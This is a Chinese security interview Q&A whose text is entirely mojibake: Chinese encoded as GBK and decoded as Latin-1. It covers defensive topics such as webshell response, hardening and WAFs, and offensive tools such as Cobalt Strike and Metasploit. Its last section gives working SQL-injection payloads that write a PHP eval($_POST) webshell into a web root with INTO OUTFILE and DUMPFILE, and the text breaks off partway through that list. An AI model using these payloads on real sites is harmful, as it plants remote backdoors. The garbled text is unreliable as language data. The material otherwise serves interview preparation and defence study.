Ò». ×°±¸Îó±¨ÈçÄÇÀïÖã¿£¿£¿
´ð£º
À´×ÔÍâÍøµÄÎó±¨ËµÃ÷Çå¾²×°±¸ÐèÒª¾ÙÐÐÕ½ÂÔÉý¼¶£¬£¬²»ÐèÒª´¦Öóͷ£¡£¡£¡£¡£¡£
ÈôÊÇÊÇÀ´×ÔÄÚÍøµÄÎ󱨿ÉÒÔºÍÈÏÕæÈËÐÉÌһϿ´Äܲ»¿É½â¾ö£¬£¬ÓÐÐëÒªµÄ»°Ìí¼Ó°×Ãûµ¥´¦Öóͷ£¡£¡£¡£¡£¡£
¶þ. ÔõÑùÇø·ÖɨÃèÁ÷Á¿ºÍÊÖ¹¤Á÷Á¿£¿£¿£¿
´ð£º
1.ɨÃèÁ÷Á¿Êý¾ÝÁ¿´ó£¬£¬ÇëÇóÁ÷Á¿ÓмÍÂÉ¿ÉÑÇÒÆµÂʽϸߣ¬£¬ÊÖ¹¤Á÷Á¿ÇëÇóÉÙ£¬£¬¾àÀëÂÔ³¤
2.ʹÓù¤¾ßɨÃèµÄÁ÷Á¿Ò»Ñùƽ³£ÔÚÊý¾Ý°üÖÐÓÐÏà¹ØÌØÕ÷ÐÅÏ¢£¬£¬ºÃ±È˵ͨ¹ýwiresharkÍøÂç·â°üÆÊÎö¹¤¾ß¶ÔÁ÷Á¿¾ÙÐÐÒ»¸öÏêϸµÄÅŲéÆÊÎö£¬£¬ºÃ±Èͨ¹ýhttp contains "xxx"À´²éÕÒÊý¾Ý°üÖеÄÒªº¦×Ö¡£¡£¡£¡£¡£

ºÃ±È³£ÓõÄÎó²îɨÃ蹤¾ßAWVS£¬£¬NessusÒÔ¼°APPscanÔÚÇëÇóµÄURL£¬£¬Headers, BodyÈýÏîÀïËæ»ú°üÀ¨ÁËÄÜ´ú±í×Ô¼ºµÄÌØÕ÷ÐÅÏ¢¡£¡£¡£¡£¡£
Èý. ÍøÕ¾±»ÉÏ´«webshellÈçÄÇÀïÖã¿£¿£¿
´ð£º
1.Ê×ÏȹرÕÍøÕ¾£¬£¬ÏÂÏßЧÀÍ¡£¡£¡£¡£¡£ÓÐÐëÒªµÄ»°½«Ð§ÀÍÆ÷¶ÏÍø¸ôÀë¡£¡£¡£¡£¡£
2.ÊÖ¹¤Á¬Ïµ¹¤¾ß¾ÙÐмì²â¡£¡£¡£¡£¡£
¹¤¾ß·½ÃæºÃ±ÈʹÓÃD¶Üwebshellkill£¬£¬ºÓÂíwebshell²éɱ£¬£¬°Ù¶ÈÔÚÏßwebshell²éɱµÈ¹¤¾ß¶ÔÍøÕ¾Ä¿Â¼¾ÙÐÐÅŲé²éɱ£¬£¬ÈôÊÇÊÇÔÚ»¤ÍøÊ±´ú¿ÉÒÔ½«Ñù±¾±¸·ÝÔÙ¾ÙÐвéɱ¡£¡£¡£¡£¡£
ÊÖ¹¤·½ÃæÁÙ±ÈδÉÏ´«webshellǰµÄ±¸·ÝÎļþ£¬£¬´ÓÎļþÉõÖÁ´úÂë²ãÃæ¾ÙÐбÈÕÕ£¬£¬¼ì²éÓÐÎÞºóÃųÌÐò»òÕ߯äËûÒì³£Îļþ£¬£¬×Åʵ²»¿É¾ÍÖ±½ÓÓñ¸·ÝÎļþÌæ»»ÁË¡£¡£¡£¡£¡£
4.ÔöÇ¿Çå¾²Õ½ÂÔ£¬£¬ºÃ±È°´ÆÚ±¸·ÝÍøÕ¾ÉèÖÃÎļþ£¬£¬ÊµÊ±×°ÖÃЧÀÍÆ÷²¹¶¡£¬£¬°´ÆÚ¸üÐÂ×é¼þÒÔ¼°Çå¾²·À»¤Èí¼þ£¬£¬°´ÆÚÐÞ¸ÄÃÜÂëµÈµÈ²½·¥¡£¡£¡£¡£¡£
ËÄ. ¸øÄãÒ»¸ö½ÏÁ¿´óµÄÈÕÖ¾£¬£¬Ó¦¸ÃÔõÑùÆÊÎö£¿£¿£¿
´ð£º
¹¥»÷¹æÔòÆ¥Åäͨ¹ýÕýÔòÆ¥ÅäÈÕÖ¾ÖеĹ¥»÷ÇëÇó
ͳ¼ÆÒªÁ죬£¬Í³¼ÆÇëÇó·ºÆð´ÎÊý£¬£¬´ÎÊýÉÙÓÚͬÀàÇëÇ󯽾ù´ÎÊýÔòΪÒì³£ÇëÇó
°×Ãûµ¥Ä£Ê½£¬£¬ÎªÕý³£ÇëÇó½¨Éè°×Ãûµ¥£¬£¬²»ÔÚÃûµ¥¹æÄ£ÄÚÔòΪÒì³£ÇëÇó
HMM Ä£×Ó£¬£¬ÀàËÆÓÚ°×Ãûµ¥£¬£¬²î±ðµãÔÚÓڿɶÔÕý³£ÇëÇó×Ô¶¯»¯½¨ÉèÄ£×Ó£¬£¬´Ó¶øÍ¨¹ýÕý³£Ä£×ÓÕÒ³ö²»Æ¥ÅäÕßÔòΪÒì³£ÇëÇó
ʹÓÃÈÕÖ¾ÆÊÎö¹¤¾ß£¬£¬ÈçLogForensics£¬£¬Graylog£¬£¬Nagios£¬£¬ELK StackµÈµÈ
Îå. ³£¼ûOAϵͳ£¿£¿£¿
´ð£º
PHP£ºÍ¨´ïOA¡¢·ºÎ¢ Eoffice
Java£º·ºÎ¢OA/ÔÆÇÅ¡¢ÖÂÔ¶OA¡¢À¶ÁèOA¡¢ÓÃÓÑOA
ASP£ºÆôÀ³OA
Áù. ÏàʶÇå¾²×°±¸Â𣿣¿£¿
´ð£º
ÈëÇÖ·ÀÓùϵͳIPS
ÊÇÅÌËã»úÍøÂçÇå¾²ÉèÊ©£¬£¬ÊǶԷÀ²¡¶¾Èí¼þºÍ·À»ðǽµÄÔö²¹¡£¡£¡£¡£¡£ÈëÇÖÔ¤·ÀϵͳÊÇÒ»²¿Äܹ»¼àÊÓÍøÂç»òÍøÂç×°±¸µÄÍøÂçÊý¾Ý´«ÊäÐÐΪµÄÅÌËã»úÍøÂçÇå¾²×°±¸£¬£¬Äܹ»¼´Ê±µÄÖÐÖ¹¡¢µ÷½â»ò¸ôÀëһЩ²»Õý³£»£»£»£»£»òÊǾßÓÐΣÏÕÐÔµÄÍøÂçÊý¾Ý´«ÊäÐÐΪ¡£¡£¡£¡£¡£
ÈëÇÖ¼ì²âϵͳIDS
Æð¾¢×Ô¶¯µÄ·À»¤²½·¥£¬£¬Æ¾Ö¤Ò»¶¨µÄÇå¾²Õ½ÂÔ£¬£¬Í¨¹ýÈí¼þ£¬£¬Ó²¼þ¶ÔÍøÂ磬£¬ÏµÍ³µÄÔËÐоÙÐÐʵʱµÄ¼à¿Ø£¬£¬¾¡¿ÉÄܵط¢Ã÷ÍøÂç¹¥»÷ÐÐΪ£¬£¬Æð¾¢×Ô¶¯µÄ´¦Öóͷ£¹¥»÷£¬£¬°ü¹ÜÍøÂç×ÊÔ´µÄÉñÃØÐÔ£¬£¬ÍêÕûÐԺͿÉÓÃÐÔ¡£¡£¡£¡£¡£
·À»ðǽ
·À»ðǽÊÇλÓÚÁ½¸ö(»ò¶à¸ö)ÍøÂç¼ä£¬£¬ÊµÑéÍøÂç¼ä»á¼û»ò¿ØÖƵÄÒ»×é×é¼þÜöÝÍÖ®Ó²¼þ»òÈí¼þ¡£¡£¡£¡£¡£¸ôÀëÍøÂ磬£¬Öƶ©³ö²î±ðÇøÓòÖ®¼äµÄ»á¼û¿ØÖÆÕ½ÂÔÀ´¿ØÖƲî±ðÐÅÈÎË®Æ½ÇøÓò¼ä´«Ë͵ÄÊý¾ÝÁ÷¡£¡£¡£¡£¡£
Êý¾Ý¿âÉó¼ÆÏµÍ³
ÊǶÔÊý¾Ý¿â»á¼ûÐÐΪ¾ÙÐÐî¿ÏµµÄϵͳ£¬£¬Í¨¹ý¾µÏñ»òÕß̽ÕëµÄ·½·¨ÊÕÂÞËùÓÐÊý¾Ý¿âµÄ»á¼ûÁ÷Á¿£¬£¬²¢»ùÓÚSQLÓï·¨£¬£¬ÓïÒåµÄÆÊÎöÊÖÒÕ£¬£¬¼Í¼Ï¶ÔÊý¾Ý¿âËùÓлá¼ûºÍ²Ù×÷ÐÐΪ£¬£¬ÀýÈç»á¼ûÊý¾ÝµÄÓû§IP£¬£¬Õ˺ţ¬£¬Ê±¼äµÈµÈ£¬£¬¶ÔÊý¾Ý¾ÙÐвÙ×÷µÄÐÐΪµÈµÈ¡£¡£¡£¡£¡£
ÈÕÖ¾Éó¼ÆÏµÍ³
ÈÕÖ¾Éó¼ÆÏµÍ³Äܹ»Í¨¹ýÖ÷±»¶¯Á¬ÏµµÄÊֶΣ¬£¬ÊµÊ±ÇÒ²»ÖÐÖ¹µÄÊÕÂÞÓû§ÍøÂçÖвî±ð³§É̵ÄÇå¾²×°±¸£¬£¬ÍøÂç×°±¸£¬£¬Ö÷»ú£¬£¬²Ù×÷ϵͳÒÔ¼°ÖÖÖÖÓ¦ÓÃϵͳ±¬·¢µÄº£Á¿ÈÕÖ¾ÐÅÏ¢£¬£¬²¢½«ÕâЩÐÅÏ¢ËѼ¯µ½Éó¼ÆÖÐÐÄ£¬£¬¾ÙÐм¯Öл¯´æ´¢£¬£¬±¸·Ý£¬£¬ÅÌÎÊ£¬£¬É󼯣¬£¬¸æ¾¯£¬£¬ÏìÓ¦£¬£¬²¢³ö¾ß¸»ºñµÄ±¨±í±¨¸æ£¬£¬»ñÏ¤È«ÍøµÄÕûÌåÇå¾²ÔËÐÐÌ¬ÊÆ£¬£¬Í¬Ê±Öª×ãµÈ±£¹ØÓÚÇå¾²ÖÎÀíÖÐÐĵÄÈÕÖ¾ÉúÑÄʱ¼ä´óÓÚ6¸öÔµÄÒªÇ󡣡£¡£¡£¡£
±¤ÀÝ»ú
ÊÇÕë¶ÔÄÚ²¿ÔËάְԱµÄÔËάÇå¾²Éó¼ÆÏµÍ³¡£¡£¡£¡£¡£Ö÷Òª¹¦Ð§ÊǶÔÔËάְԱµÄÔËά²Ù×÷¾ÙÐÐÉó¼ÆºÍȨÏÞ¿ØÖÆ(ºÃ±ÈÒªµÇ¼ijЩƽ̨»òÕßϵͳֻÄÜͨ¹ý±¤ÀÝ»ú²Å¿ÉÒÔ£¬£¬²»±Ø±¤ÀÝ»úÊÇÎÞ·¨»á¼ûµÄ)¡£¡£¡£¡£¡£Í¬Ê±±¤ÀÝ»úÉÐÓÐÕ˺ż¯ÖÐÖÎÀí£¬£¬µ¥µãµÇ¼(ÔÚ±¤ÀÝ»úÉϵǼ¼´¿ÉʵÏÖ¶Ô¶à¸öÆäËûƽ̨µÄÎÞÃܵǼ)µÈ¹¦Ð§¡£¡£¡£¡£¡£
Îó²îɨÃèϵͳ
Îó²îɨÃ蹤¾ß»òÕß×°±¸ÊÇ»ùÓÚÎó²îÊý¾Ý¿â£¬£¬Í¨¹ýɨÃèµÈÊֶζÔÖ¸¶¨µÄÔ¶³Ì»òÍâµØÅÌËã»úϵͳµÄÇ徲ųÈõÐÔ¾ÙÐмì²â£¬£¬·¢Ã÷¿ÉʹÓÃÎó²îµÄÒ»ÖÖÇå¾²¼ì²âϵͳ(ÎÒÃdz£ÓõÄÕë¶ÔWEBÕ¾µã¾ÙÐÐɨÃèµÄ¹¤¾ßºÍ´Ë´¦Îó²îɨÃèϵͳ²»ÊÇÒ»¸ö¿´·¨)¡£¡£¡£¡£¡£
Êý¾ÝÇå¾²Ì¬ÊÆ¸Ð֪ƽ̨
ÒÔ´óÊý¾Ýƽ̨Ϊ»ù´¡£¬£¬Í¨¹ýÍøÂç¶àÔª£¬£¬Òì¹¹µÄº£Á¿ÈÕÖ¾£¬£¬Ê¹ÓùØÁªÆÊÎö£¬£¬»úеѧϰ£¬£¬ÍþвÇ鱨£¬£¬¿ÉÊÓ»¯µÈÊÖÒÕ£¬£¬×ÊÖúÓû§Ò»Á¬¼à²âÍøÂçÇå¾²Ì¬ÊÆ£¬£¬ÊµÏÖ´Ó±»¶¯·ÀÓùÏòÆð¾¢·ÀÓùµÄ½ø½×¡£¡£¡£¡£¡£
ÖÕ¶ËÇå¾²ÖÎÀíϵͳ
ÊǼ¯·À²¡¶¾£¬£¬ÖÕ¶ËÇå¾²¹Ü¿Ø£¬£¬ÖÕ¶Ë×¼È룬£¬ÖÕ¶ËÉ󼯣¬£¬ÍâÉè¹Ü¿Ø£¬£¬EDRµÈ¹¦Ð§ÓÚÒ»Ì壬£¬¼æÈݲî±ð²Ù×÷ϵͳºÍÅÌËã»úƽ̨£¬£¬×ÊÖú¿Í»§ÊµÏÖÆ½Ì¨Ò»Ì廯£¬£¬¹¦Ð§Ò»Ì廯£¬£¬Êý¾ÝÒ»Ì廯µÄÖÕ¶ËÇå¾²Á¢Ìå·À»¤¡£¡£¡£¡£¡£
WAF
WAFÊÇÒÔÍøÕ¾»òÓ¦ÓÃϵͳΪ½¹µãµÄÇå¾²²úÆ·£¬£¬Í¨¹ý¶ÔHTTP»òHTTPSµÄWeb¹¥»÷ÐÐΪ¾ÙÐÐÆÊÎö²¢×èµ²£¬£¬ÓÐÓõĽµµÍÍøÕ¾Ç徲Σº¦¡£¡£¡£¡£¡£²úÆ·Ö÷Òª°²ÅÅÔÚÍøÕ¾Ð§ÀÍÆ÷µÄǰ·½¡£¡£¡£¡£¡£Í¨¹ýÌØÕ÷ÌáÈ¡ºÍ·Ö¿é¼ìË÷ÊÖÒÕ¾ÙÐÐģʽƥÅäÀ´µÖ´ï¹ýÂË£¬£¬ÆÊÎö£¬£¬Ð£ÑéÍøÂçÇëÇó°üµÄÄ¿µÄ£¬£¬ÔÚ°ü¹ÜÕý³£ÍøÂçÓ¦Óù¦Ð§µÄͬʱ£¬£¬×è¶ô»òÕß×è¶ÏÎÞЧ»òÕß²»·¨µÄ¹¥»÷ÇëÇ󡣡£¡£¡£¡£
ÃÛ¹Þ
ÃÛ¹ÞÊÇÒ»ÖÖÇå¾²ÍþвµÄ×Ô¶¯·ÀÓùÊÖÒÕ£¬£¬Ëüͨ¹ýÄ£ÄâÒ»¸ö»ò¶à¸öÒ×Êܹ¥»÷µÄÖ÷»ú»òЧÀÍÀ´ÎüÒý¹¥»÷Õߣ¬£¬²¶»ñ¹¥»÷Á÷Á¿ÓëÑù±¾£¬£¬·¢Ã÷ÍøÂçÍþв£¬£¬ÌáÈ¡ÍþÐ²ÌØÕ÷£¬£¬Ã۹޵ļÛÖµÔÚÓÚ±»Ì½²â£¬£¬¹¥ÏÝ¡£¡£¡£¡£¡£
Æß. Ïàʶ¹ýϵͳ¼Ó¹ÌÂ𣿣¿£¿
´ð£º
ÕË»§Çå¾²
windows
ºÃ±ÈÉèÖõǼʱ²»ÏÔʾÉϴεǼµÄÓû§Ãû£¬£¬±ÜÃâÈõ¿ÚÁî±¬ÆÆ¡£¡£¡£¡£¡£
ÉèÖÃÕË»§Ëø¶¨Õ½ÂÔ£¬£¬ºÃ±È˵µÇ¼ÐÐΪÏÞÖÆ´ÎÊý£¬£¬µÖ´ï´ÎÊýºóËø¶¨¶à³¤Ê±¼ä¡£¡£¡£¡£¡£
linux
½ûÓÃrootÖ®ÍâµÄ³¬µÈÓû§ ʹÓÃpassword -l <Óû§Ãû>ÏÂÁîÀ´Ëø¶¨Óû§ -u½âËø
ÏÞÖÆÍ¨Ë×Óû§Ê¹ÓÃsudoÌáȨ£¬£¬»òÕß˵ÏÞÖÆÌáȨµÄȨÏÞ¾Þϸ
Ëø¶¨ÏµÍ³ÖжàÓàµÄ×Ô½¨Õ˺Å
ÉèÖÃÕË»§Ëø¶¨µÇ¼ʧ°ÜËø¶¨´ÎÊý£¬£¬Ëø×¼Ê±¼ä faillog -u <Óû§Ãû>ÏÂÁîÀ´½âËøÓû§
¿ÚÁîÇå¾²
windows
ÉèÖÃÃÜÂë±ØÐèÇкÏÖØ´óÐÔÒªÇ󣬣¬ºÃ±ÈÉèÖÃʱÊý×Ö£¬£¬´óд×Öĸ£¬£¬Ð¡Ð´×Öĸ£¬£¬ÌØÊâ×Ö·û¶¼Òª¾ß±¸
ÉèÖÃ×îСÃÜÂ볤¶È²»¿ÉΪ0£¬£¬ÉèÖò»¿ÉʹÓÃÀúÊ·ÃÜÂë
linux
¼ì²éshadowÖпտÚÁîÕ˺ţ¬£¬Ð޸ĿÚÁîÖØÆ¯ºó£¬£¬ÉèÖÃÃÜÂëÓÐÓÃÆÚvim /etc/login.defÏÂÁî
ЧÀÍÓë¶Ë¿ÚÊÕÁ²
¹Ø±Õ»òÕßÏÞÖÆ³£¼ûµÄ¸ßΣ¶Ë¿Ú£¬£¬ºÃ±È˵22¶Ë¿Ú(SSH)£¬£¬23¶Ë¿Ú(Telnet)£¬£¬3389¶Ë¿Ú(RDP)
compmgmt.mscÅŲéÍýÏëʹÃü
linuxÉÏiptables·â½ûIP»òÕßÏÞÖÆ¶Ë¿Ú
ÎļþȨÏÞÖÎÀí
linuxÉÏchmodÐÞ¸ÄÎļþȨÏÞ chattrÖ÷ÒªÎļþÉèÖò»¿ÉÐÞ¸ÄȨÏÞ
ϵͳÈÕÖ¾Éó¼Æ
linuxÉÏÉèÖÃϵͳÈÕÖ¾Õ½ÂÔÉèÖÃÎļþ
ϵͳÈÕÖ¾ /var/log/message
cronÈÕÖ¾/var/log/cron
Çå¾²ÈÕÖ¾/var/log/secure
×°±¸ºÍÍøÂç¿ØÖÆ
ºÃ±ÈÔÚÉæÃÜÅÌËã»úÉÏեȡ»á¼ûÍâÍø£¬£¬ÎªÁË×èÖ¹Óû§ÈƹýÕ½ÂÔ¿ÉÒÔեȡÓû§ÐÞ¸ÄIP
ɾ³ýĬÈÏ·ÓÉÉèÖ㬣¬×èֹʹÓÃĬÈÏ·ÓÉ̽²âÍøÂç
եȡʹÓÃUSB×°±¸ºÃ±ÈUÅÌ
եȡpingÏÂÁ£¬¼´½ûÓÃICMPÐÒé»á¼û£¬£¬²»ÈÃÍⲿpingͨЧÀÍÆ÷
°Ë. ÓÐûÓÐÇå¾²×°±¸µÄʹÓÃÂÄÀú£¿£¿£¿
´ð£º
Ì¬ÊÆ¸ÐÖª»òÕß˵Çå¾²ÔËÓª·½Ã濪ԴÏîÄ¿OSSIM¡£¡£¡£¡£¡£
IPS(ÈëÇÖ·ÀÓùϵͳ)·½ÃæSnortºÍÇå¾²Ñó´ÐSecurity Onion¡£¡£¡£¡£¡£
·À»ðǽ·½ÃæTinyWallºÍClearOS£¬£¬»òÕß˵Ïñ»ðÈÞ£¬£¬ÌÚѶÇå¾²¹Ü¼ÒµÈһЩͨÀýµÄ·À»¤Èí¼þ¡£¡£¡£¡£¡£
WAF£¨WebÓ¦Ó÷À»ðǽ £©·½ÃæModSecurityºÍÍøÕ¾Çå¾²¹·ÒÔ¼°¸¡Í¼¡£¡£¡£¡£¡£
ÍþвÇ鱨·½ÃæMISPºÍOpenCTI¡£¡£¡£¡£¡£
Îó²îɨÃè·½ÃæOpenVAS£¬£¬Õë¶ÔwebÕ¾µãµÄÎó²îɨÃ蹤¾ßʹÓùýAWVS£¬£¬Nessus
±¤ÀÝ»ú·½ÃæJumpServer(linuxϵͳװÖ㬣¬µ«¿ÉÒÔÌí¼ÓwindowsÖ÷»ú×÷Ϊ×ʲú)¡£¡£¡£¡£¡£
ÃÛ¹Þ·½ÃæT-Pot(»ùÓÚLinuxϵͳװÖÃ)ºÍ΢²½µÄHfish¡£¡£¡£¡£¡£
¾Å. CSÊÇʲô¹¤¾ß£¬£¬ÖªµÀÔõôʹÓÃÂ𣿣¿£¿
´ð£º
¼ò½é
CobaltStrikeÊÇÒ»¿îÉøÍ¸²âÊÔ¹¤¾ß£¬£¬±»Òµ½çÈ˳ÆÎªCS¡£¡£¡£¡£¡£CobaltStrike·ÖΪ¿Í»§¶ËÓëЧÀͶˣ¬£¬Ð§ÀͶËÊÇÒ»¸ö£¬£¬¿Í»§¶Ë¿ÉÒÔÓжà¸ö£¬£¬¿ÉÓÃÓÚÍŶÓÂþÑÜʽÐͬ²Ù×÷¡£¡£¡£¡£¡£
¹¦Ð§
CobaltStrike ¼¯³ÉÁ˶˿Úת·¢£¬£¬Ð§ÀÍɨÃ裬£¬×Ô¶¯»¯Òç³ö£¬£¬¶àģʽ¶Ë¿Ú¼àÌý£¬£¬windows exe ľ ÂíÌìÉú£¬£¬windows dll ľÂíÌìÉú£¬£¬java ľÂíÌìÉú£¬£¬office ºê²¡¶¾ÌìÉú£¬£¬Ä¾ÂíÀ¦°ó¡£¡£¡£¡£¡£´¹ÂÚ¹¥»÷µÈ¹¦Ð§¡£¡£¡£¡£¡£
ʹÓÃ
Ò»Ñùƽ³£Ê¹Óð취¾ÍÊÇ£¬£¬ÏÈÆô¶¯Ð§ÀͶˣ¬£¬È»ºóÆô¶¯¿Í»§¶ËÅþÁ¬»ñµÃÒ»¸ö¿ÉÊÓ»¯µÄ½çÃæ£¬£¬Ð½¨¼àÌýÆ÷À´ÎüÊջỰ£¬£¬ÌìÉúľÂíÎļþ(³£¼û.exe¿ÉÖ´ÐÐÎļþ£¬£¬officeºê²¡¶¾£¬£¬htmlÓ¦ÓóÌÐòÀàÐ͵ĺóÃÅÎļþ)£¬£¬ÉÏ´«µ½Êܺ¦ÕßÖ÷»ú£¬£¬µ±Êܺ¦ÕßÔËÐиÃľÂíÎļþʱĿµÄÖ÷»ú¾ÍÔÚCSÉÏÏßÁË¡£¡£¡£¡£¡£
Ê®. WAF·½ÃæÓÐûÓÐÏàʶ¹ý£¬£¬ÇåÎúWAFµÄ·ÖÀàºÍÔÀíÂ𣿣¿£¿
´ð£º
·ÖÀࣺ
WAF·ÖΪ·ÇǶÈëÐÍWAFºÍǶÈëÐÍWAF£¬£¬·ÇǶÈëÐÍÖ¸µÄÊÇÓ²WAF¡¢ÔÆWAF¡¢ÐéÄâ»úWAFÖ®ÀàµÄ£»£»£»£»£»Ç¶ÈëÐÍÖ¸µÄÊÇwebÈÝÆ÷Ä£¿£¿£¿éÀàÐÍWAF¡¢´úÂë²ãWAF¡£¡£¡£¡£¡£
ÔÀí£º
WebÓ¦Ó÷À»ðǽÊÇͨ¹ýÖ´ÐÐһϵÁÐÕë¶ÔHTTP»òÕßHTTPSµÄÇå¾²Õ½ÂÔÀ´×¨ÃÅΪWebÓ¦ÓÃÌṩ±£»£»£»£»£»¤µÄÒ»¿î²úÆ·¡£¡£¡£¡£¡£WAF¶ÔÇëÇóµÄÄÚÈݾÙÐйæÔòÆ¥Åä¡¢ÐÐΪÆÊÎöµÈʶ±ð³ö¶ñÒâÐÐΪ£¬£¬²¢Ö´ÐÐÏà¹ØÐж¯£¬£¬ÕâЩÐж¯°üÀ¨×è¶Ï¡¢¼Í¼¡¢¸æ¾¯µÈ¡£¡£¡£¡£¡£
ʮһ. PowershellÏàʶ¹ýÂ𣿣¿£¿
´ð£º
¼ò½é
PowerShell ÊÇÒ»ÖÖÏÂÁîÐÐÍâ¿Ç³ÌÐòºÍ¾ç±¾ÇéÐΣ¬£¬Ö÷ÒªÓÃÓÚWindowsÅÌËã»úÀû±ãÖÎÀíÔ±¾ÙÐÐϵͳÖÎÀí²¢ÓпÉÄÜÔÚδÀ´È¡´úWindowsÉϵÄĬÈÏÏÂÁîÌáÐÑ·û¡£¡£¡£¡£¡£PowerShell¾ç±¾ÒòÆäÓÅÒìµÄ¹¦Ð§ÌØÕ÷³£ÓÃÓÚÕý³£µÄϵͳÖÎÀíºÍÇå¾²ÉèÖÃÊÂÇé¡£¡£¡£¡£¡£
ʹÓÃ
³£¼ûµÄ²Ù×÷ pwd ls cd mkdir rm
get-process»ñÈ¡ËùÓÐÀú³ÌÐÅÏ¢
get-date»ñȡĿ½ñʱ¼äÐÅÏ¢
get-host»ñȡĿ½ñÖ÷»úÐÅÏ¢
È»ºó¾ÍÊÇʹÓÃPowersSploit(»ùÓÚPowershellµÄºóÉøÍ¸¿ò¼ÜÈí¼þ£¬£¬°üÀ¨ÁËÐí¶àPower shell¹¥»÷¾ç±¾£¬£¬Ö÷ÒªÓÃÓÚÉøÍ¸ÖеÄÐÅÏ¢ÍøÂ磬£¬È¨ÏÞÌáÉý£¬£¬È¨ÏÞά³Ö)µÄʱ¼äÔÚPowshellÉÏʹÓùýһЩÏÂÔØºÍÔËÐй¥»÷¾ç±¾µÄÏÂÁî¡£¡£¡£¡£¡£
Ê®¶þ. MSFÊÇʲô£¿£¿£¿ÖªµÀÔõôʹÓÃÂ𣿣¿£¿
´ð£º
¼ò½é£º
Metasploit Framework(MSF)ÊÇÒ»¿î¿ªÔ´Çå¾²Îó²î¼ì²â¹¤¾ß£¬£¬¸½´øÊýǧ¸öÒÑÖªµÄÈí¼þÎó²î£¬£¬²¢¼á³ÖÒ»Á¬¸üС£¡£¡£¡£¡£Metasploit¿ÉÒÔÓÃÀ´ÐÅÏ¢ÍøÂç¡¢Îó²î̽²â¡¢Îó²îʹÓõÈÉøÍ¸²âÊÔµÄÈ«Á÷³Ì¡£¡£¡£¡£¡£
Ä£¿£¿£¿é£º
Auxiliary£¨¸¨ÖúÄ£¿£¿£¿é£©
ÎªÉøÍ¸²âÊÔÐÅÏ¢ËѼ¯ÌṩÁË´ó×ڵĸ¨ÖúÄ£¿£¿£¿éÖ§³Ö
Exploits£¨¹¥»÷Ä£¿£¿£¿é£©
ʹÓ÷¢Ã÷µÄÇå¾²Îó²î»òÉèÖÃÈõµã¶ÔÔ¶³ÌÄ¿µÄϵͳ ¾ÙÐй¥»÷£¬£¬´Ó¶ø»ñµÃ¶ÔÔ¶³ÌÄ¿µÄϵͳ»á¼ûȨµÄ´úÂë×é¼þ¡£¡£¡£¡£¡£
Payload£¨¹¥»÷ÔØºÉÄ£¿£¿£¿é£©
¹¥»÷Àֳɺó´Ùʹ°Ð»úÔËÐеÄÒ»¶ÎÖ²Èë´úÂë
Post £¨ºóÉøÍ¸¹¥»÷Ä£¿£¿£¿é£©
ÍøÂç¸ü¶àÐÅÏ¢»ò½øÒ»²½»á¼û±»Ê¹ÓõÄÄ¿µÄϵͳ
Encoders£¨±àÂëÄ£¿£¿£¿é£©
½«¹¥»÷ÔØºÉ¾ÙÐбàÂ룬£¬À´Èƹý·À»¤Èí¼þ×èµ²
ʹÓãº
Ê×ÏÈʹÓÃAuxiliary¸¨Öú̽²âÄ£¿£¿£¿éɨÃ裬£¬Ðá̽£¬£¬Ö¸ÎÆÊ¶±ðÏà¹ØÎó²î£¬£¬È»ºóÈ·ÈÏÎó²î±£´æÊ¹ÓÃExploitÎó²îʹÓÃÄ£¿£¿£¿é¶ÔÎó²î¾ÙÐÐʹÓ㬣¬°üÀ¨ÉèÖÃpayload¹¥»÷ÔØºÉ£¬£¬ÉèÖñ¾»ú¼àÌýµÈµÈ¡£¡£¡£¡£¡£Îó²îʹÓÃÀÖ³ÉÄ¿µÄÖ÷»ú¾Í»áͨ¹ýÉèÖõĶ˿Ú×Ô¶¯ÅþÁ¬£¬£¬±¬·¢»á»°¡£¡£¡£¡£¡£½ø¶ø¿ÉÒÔ¾ÙÐкóÉøÍ¸¡£¡£¡£¡£¡£
¹¦Ð§£º
ľÂíÃâɱ£¬£¬×¥È¡Óû§ÃÜÂ룬£¬¹Ø±Õɱ¶¾Èí¼þ£¬£¬ÆÁÄ»½ØÍ¼£¬£¬Ð½¨Õ˺ţ¬£¬Ô¶³ÌµÇ¼£¬£¬Ç¨áãÀú³Ì£¬£¬ÌáȨ²Ù×÷£¬£¬ÍøÂçÐá̽£¬£¬¶Ë¿Úת·¢ £¬£¬ÄÚÍøÊðÀí£¬£¬ÄÚÍøÉ¨Ã裬£¬ÌìÉúºóÃÅ£¬£¬É¨³ýÈÕÖ¾µÈµÈ¡£¡£¡£¡£¡£
Ê®Èý. ʹÓùýʲôXSSƽ̨Â𣿣¿£¿
´ð£º
1.Ç廪À¶Á«»¨Õ½¶ÓµÄBlueLotus¡£¡£¡£¡£¡£
2.xss-platformƽ̨¡£¡£¡£¡£¡£
2.kaliÖеÄbeefƽ̨¡£¡£¡£¡£¡£
3.ʹÓù¤¾ßPostman¡£¡£¡£¡£¡£
Ê®ËÄ. SQL×¢ÈëÔõôдÈëwebshell£¿£¿£¿
´ð£º
Ìõ¼þ£º
1¡¢ÖªµÀweb¾ø¶Ô·¾¶
2¡¢ÓÐÎļþдÈëȨÏÞ(Ò»Ñùƽ³£ÇéÐÎÖ»ÓÐROOTÓû§ÓÐ)
3¡¢Êý¾Ý¿â¿ªÆôÁËsecure_file_privÉèÖÃ
È»ºó¾ÍÄÜÓÃselect into outfileдÈëwebshell
³£¼ûÊÖ·¨£º
ÁªºÏ×¢ÈëдÈë
?id=1' union select 1,"<?php @eval($_POST['shell']);?>",3 into outfile 'C:\\phpstudy\\WWW\\sqli\\shell.php'#
dumpfileº¯ÊýдÈë
?id=1' union select 1,"<?php @eval($_POST['shell']);?>",3 into dumpfile 'C:\\phpstudy\\WWW\\sqli\\shell.php'#
lines terminated by дÈë
?id=1 into outfile 'C:/wamp64/www/shell.php' lines terminated by '<?php phpinfo()?>';
//lines terminated by ¿ÉÒÔÃ÷ȷΪ ÒÔÿÐÐÖÕÖ¹µÄλÖÃÌí¼Ó xx ÄÚÈÝ¡£¡£¡£¡£¡£
lines starting by дÈë
?id=1 into outfile 'C:/wamp64/www/shell.php' lines starting by '<?php phpinfo()?>';//ʹÓà lines starting by Óï¾äÆ´½ÓwebshellµÄÄÚÈÝ¡£¡£¡£¡£¡£lines starting by ¿ÉÒÔÃ÷ȷΪ ÒÔÿÐÐ×îÏȵÄλÖÃÌí¼Ó xx ÄÚÈÝ¡£¡£¡£¡£¡£
fields terminated by дÈë
